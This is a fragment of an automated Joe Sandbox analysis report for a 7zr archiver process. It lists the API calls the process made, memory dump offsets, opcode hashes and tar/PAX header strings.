                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID:
                          • API String ID: 1795875747-0
                          • Opcode ID: ebe74f7f55567795f735203d7ef6b7c694407a0d349edd40f8dcc8eb7751935a
                          • Instruction ID: 3d40ebc9fd5e5e2a8d74b61156156b9f6b47988b5b4cb98e7dafd09c0ba09f7e
                          • Opcode Fuzzy Hash: ebe74f7f55567795f735203d7ef6b7c694407a0d349edd40f8dcc8eb7751935a
                          • Instruction Fuzzy Hash: 43D01232504119BBCF156BD4EC06CDD77BCEF1C214710441AF545E2150EAB5E6158B94
                          APIs
                          • __EH_prolog.LIBCMT ref: 001BF74A
                            • Part of subcall function 001BF784: __EH_prolog.LIBCMT ref: 001BF789
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 5795fae21379de16ec9658651472c0de4a5d6cf85c4176c53b5482aeb807bf03
                          • Instruction ID: 627858882263497d5794ea9f1d6a8bb2e3f4c76cc5eb7d75a205bf6e74c33547
                          • Opcode Fuzzy Hash: 5795fae21379de16ec9658651472c0de4a5d6cf85c4176c53b5482aeb807bf03
                          • Instruction Fuzzy Hash: 81D01272A25214BFD7149B85ED12BEEB778EB45758F10056EF00161141C7B55A008AA4
                          APIs
                          • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,0018785F,00000000,00004000,00000000,00000002,?,?,?), ref: 00187B65
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 9631491fde9e7e6ea9acdf78a050755c05b0090a67883a789b90e12a8705bc62
                          • Instruction ID: c239299a591ec959203f27aac313ed5e1b181bd62730bdbb0a51a7f3ef8ac0c7
                          • Opcode Fuzzy Hash: 9631491fde9e7e6ea9acdf78a050755c05b0090a67883a789b90e12a8705bc62
                          • Instruction Fuzzy Hash: E2E0EC75200208FBDF11CF90CC05F8E7BB9AF49754F208058E90596160C375AA64EB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001D80AF
                            • Part of subcall function 00181E0C: malloc.MSVCRT ref: 00181E1F
                            • Part of subcall function 00181E0C: _CxxThrowException.MSVCRT(?,00234B28), ref: 00181E39
                            • Part of subcall function 001CBDB5: __EH_prolog.LIBCMT ref: 001CBDBA
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrowmalloc
                          • String ID:
                          • API String ID: 3744649731-0
                          • Opcode ID: 1f2d236f21c6dc569ccbb7d663fb15d6f5f430f4c78f50c6731a59c72cc8188e
                          • Instruction ID: b92caf321cf072d04d883154959fe4eae8c10dafbf4ac750bf4224e783669496
                          • Opcode Fuzzy Hash: 1f2d236f21c6dc569ccbb7d663fb15d6f5f430f4c78f50c6731a59c72cc8188e
                          • Instruction Fuzzy Hash: 23D05E71B19101AFCB48FFF8A4227AE72E4AB58704F00457EB016E3B81EF708A40CA20
                          APIs
                          • FindClose.KERNELBASE(00000000,?,00186880), ref: 00186853
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 7c236243e3694b1257789af9791b24b2c7ed9a37c2e3098db1c3f373181db192
                          • Instruction ID: 2176cba3d7c0e136bdc60d7b8faa3f11d4d9c9d3cf0ba9c0da636fced2ad135a
                          • Opcode Fuzzy Hash: 7c236243e3694b1257789af9791b24b2c7ed9a37c2e3098db1c3f373181db192
                          • Instruction Fuzzy Hash: 60D01231104322568A746EBEB84DACA33D86F073343311B9AF0B8C31E2E7708C839B90
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs
                          • String ID:
                          • API String ID: 1795875747-0
                          • Opcode ID: fea3df79794c96f37c81a752945deb66d2e11ce22af72d1189e1b11d2ef1858c
                          • Instruction ID: 704891048db41c0a4ebb26635ab9063dcd73d5d24b5004f694254b1ea5887324
                          • Opcode Fuzzy Hash: fea3df79794c96f37c81a752945deb66d2e11ce22af72d1189e1b11d2ef1858c
                          • Instruction Fuzzy Hash: C8D0C936008251AF96266F45FC0AC8BBBA5FFE9320721082FF480921609B626925DAA0
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputc
                          • String ID:
                          • API String ID: 1992160199-0
                          • Opcode ID: fcb0f0c6683682f3a4765a2d7183d0284aa01f6eb55c18ca8c827e575a6828f9
                          • Instruction ID: 3a307d319253eca3491785465a2b01d2802a094b8b1752bba1d78413b0f92e05
                          • Opcode Fuzzy Hash: fcb0f0c6683682f3a4765a2d7183d0284aa01f6eb55c18ca8c827e575a6828f9
                          • Instruction Fuzzy Hash: AAB09232308220ABE6281A9CBC0AAC46794DF09732B21005BF548C21909AD11C924A95
                          APIs
                          • SetFileTime.KERNELBASE(?,?,?,?,00187C65,00000000,00000000,?,0018F238,?,?,?,?), ref: 00187C49
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: FileTime
                          • String ID:
                          • API String ID: 1425588814-0
                          • Opcode ID: 6d409fbec6c80678d7f14e8537d7e49c767ea5c51318ff63403587a3c09cc00e
                          • Instruction ID: 6932561cae0e0dcd38cd98ddacaa664fd65d5bae85579108fc10eacccbb9601f
                          • Opcode Fuzzy Hash: 6d409fbec6c80678d7f14e8537d7e49c767ea5c51318ff63403587a3c09cc00e
                          • Instruction Fuzzy Hash: 3AC04C36158105FF8F120FB0DC09C1EBBA2ABA5721F10D918F159C4070C7328034EB02
                          APIs
                          • SetEndOfFile.KERNELBASE(?,00187D81,?,?,?), ref: 00187D3E
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: File
                          • String ID:
                          • API String ID: 749574446-0
                          • Opcode ID: 1e94443a45401fda75c70370f7411daf3f8fa93ad6f0568fb3408b95a47a6294
                          • Instruction ID: 630d43fa548e149f685a786be026b4b877926f08a8b343791199ee983778fdf5
                          • Opcode Fuzzy Hash: 1e94443a45401fda75c70370f7411daf3f8fa93ad6f0568fb3408b95a47a6294
                          • Instruction Fuzzy Hash: 96A001702A511A9A8E211B74E80A8683AA1AA5260676026A4A006CA4B5DB22442AAA41
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: memmove
                          • String ID:
                          • API String ID: 2162964266-0
                          • Opcode ID: 905849044f7bb70ba3a2618bad9265f9938eed64f92d0b9ff9b5c0b646e76aab
                          • Instruction ID: 3ffcf6f4fc928064de1d31e20fa72b741dfe9da4f5e97631e03fa96f528848a6
                          • Opcode Fuzzy Hash: 905849044f7bb70ba3a2618bad9265f9938eed64f92d0b9ff9b5c0b646e76aab
                          • Instruction Fuzzy Hash: 17813D75E0424AAFDF14EFA8C4C4AAEBBB1AF48304F248469D511B7341D771AB84CFA4
                          APIs
                          • CloseHandle.KERNELBASE(00000000,00000000,00193D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193E12
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: e891c519dec4ec0e7609db571c00871a535f4e7f0f999107b5fb833f3177b8f1
                          • Instruction ID: 4f8806291c792d4984e0e7a22b7be95a3bb15f6f81507da26bfe93ce833997ac
                          • Opcode Fuzzy Hash: e891c519dec4ec0e7609db571c00871a535f4e7f0f999107b5fb833f3177b8f1
                          • Instruction Fuzzy Hash: 77D0123151421157DF705E6CF8047D663DD6F10321B154459FC90DB144E764CCD35A90
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID:
                          • API String ID: 2803490479-0
                          • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                          • Instruction ID: 2757cc4eeea973b47650a954494e72a27643a10b2c8220222e5c1838dcf30187
                          • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                          • Instruction Fuzzy Hash: 98D0C7E162270605DF484930494D76A31951F5032EB184578A816DA1D2E715C63A9554
                          APIs
                          • CloseHandle.KERNELBASE(00000000,?,001875AF,00000002,?,00000000,00000000), ref: 00187657
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 3e873e228669e67cdb43b3b4d99e58ea9b26fd09ccc4f7a68ae1d3fe63d44d58
                          • Instruction ID: 825a9ebb99d48f3838667cb80d691fd4d295a5d7a9e56aa567076f6d347bf25e
                          • Opcode Fuzzy Hash: 3e873e228669e67cdb43b3b4d99e58ea9b26fd09ccc4f7a68ae1d3fe63d44d58
                          • Instruction Fuzzy Hash: 92D0123110862256DA746E7C78499C633D85B123343711759F4B4D32E1E360CC834B90
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000), ref: 00206B31
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: b95f02947fbd0e695b441fafbc0aff9b7087aba38a71607ba13604d0c26b4f9e
                          • Instruction ID: d2d6dca0fc33a83db2d18845e3437b54fb3fa4354423e1b0417a3828edfa3eb5
                          • Opcode Fuzzy Hash: b95f02947fbd0e695b441fafbc0aff9b7087aba38a71607ba13604d0c26b4f9e
                          • Instruction Fuzzy Hash: 48C02BE1A4D280EFDF0213509C447603F309F83300F0A10C1E4046B0D3C2041D0DC723
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID:
                          • API String ID: 2803490479-0
                          • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                          • Instruction ID: 9c3eb4c63f6b842fe5bb88bb9ba5f74c2a66581eee5a1577068098690090b573
                          • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                          • Instruction Fuzzy Hash: B5A024C553114101DF5C11303C05477104013703077C004FC7405C0103F715D1341005
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID:
                          • API String ID: 2803490479-0
                          • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                          • Instruction ID: 1f2ef43fc62933aaa5015a805dd7b420e4de90dee8d0a76032b13f7a4723221a
                          • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                          • Instruction Fuzzy Hash: 33A012CDF2010101DE4421343805463105222F06057D4C474640440106FA14C0342002
                          APIs
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00206BAC
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: e4372462c34d8f3353c38b865057496c1f7417cd48bfa8b3e4ae6338fc60f55c
                          • Instruction ID: 93c7641cb6e410016ade73dddf0493cd78161ba5f7b0077ee755c9d256995380
                          • Opcode Fuzzy Hash: e4372462c34d8f3353c38b865057496c1f7417cd48bfa8b3e4ae6338fc60f55c
                          • Instruction Fuzzy Hash: 7FA00278680700B7ED7067707D4FF5D37247780F45F3095447241690D05AE471459A9C
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                          • Instruction ID: 3cfedacb5744fa306b671ff396eba937baf4f31239e885b4b2b84a4c7af48fb0
                          • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                          • Instruction Fuzzy Hash:
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                          • Instruction ID: f025cc31fe52f18a413fe70b89e7f8aede4401e009fab4c69bb6ba53e29eb382
                          • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                          • Instruction Fuzzy Hash:
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 93b7a0df132c61880aa636f8c7c569c54a3bb63a57c73443a8fb180ff6bd50ff
                          • Instruction ID: 21da648b64908f45e09f42edfa3ba339df0d431cb89ee08e871603a51c48a1fc
                          • Opcode Fuzzy Hash: 93b7a0df132c61880aa636f8c7c569c54a3bb63a57c73443a8fb180ff6bd50ff
                          • Instruction Fuzzy Hash: E8A00271405201EBDA151B50FD0E48D7B61EF85627B315459F05B504718F314871BA01
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 52f42061bc80ccfde8fac8bdb87478d8120a21c8eee0f339e035aba2a161cf32
                          • Instruction ID: 861a243d0a7e2e15bac9a549b394f2c5a1c285523c7131a173445950170dfc82
                          • Opcode Fuzzy Hash: 52f42061bc80ccfde8fac8bdb87478d8120a21c8eee0f339e035aba2a161cf32
                          • Instruction Fuzzy Hash: 1CD0127293181557E700B6ACD84A3597765F760300FC80994D865C1157F979CB6A8692
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,001BB9BE,00000000,00000000,759A8E30), ref: 0018AB2B
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: Time$FileSystem
                          • String ID:
                          • API String ID: 2086374402-0
                          • Opcode ID: 8d1bd7db07141e4e98c8efee3b8c4c06a7066f29e72d9be017ec51505ebf13f2
                          • Instruction ID: 7318ce8b2dd4118e4c3897c6d404916d4dec20393da91184333c57aa9a3e9905
                          • Opcode Fuzzy Hash: 8d1bd7db07141e4e98c8efee3b8c4c06a7066f29e72d9be017ec51505ebf13f2
                          • Instruction Fuzzy Hash:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: ERROR$GNU$LongLink$LongName$PAX$PAX_error$PAX_overflow$PAX_unsupported_line$POSIX$SignedChecksum$WARNING$atime$bin_mtime$bin_psize$bin_size$ctime$mtime$pax_linkpath$pax_path$pax_size
                          • API String ID: 3519838083-1011227609
                          • Opcode ID: c991208a3cba9c26d32d3a52809e36a7c0be99712d087775cecf30cd14ec9f00
                          • Instruction ID: 04512f5ac23dbe9319649b8dafde960f56a6f543c2c6fbb716ed6286bee6ecfd
                          • Opcode Fuzzy Hash: c991208a3cba9c26d32d3a52809e36a7c0be99712d087775cecf30cd14ec9f00
                          • Instruction Fuzzy Hash: 4BD1067181474BDACF29EBA0D9919FEBBB1AF21300F144D1FE19663391D7306A4ADB81
                          APIs
                          • __EH_prolog.LIBCMT ref: 001E07B8
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
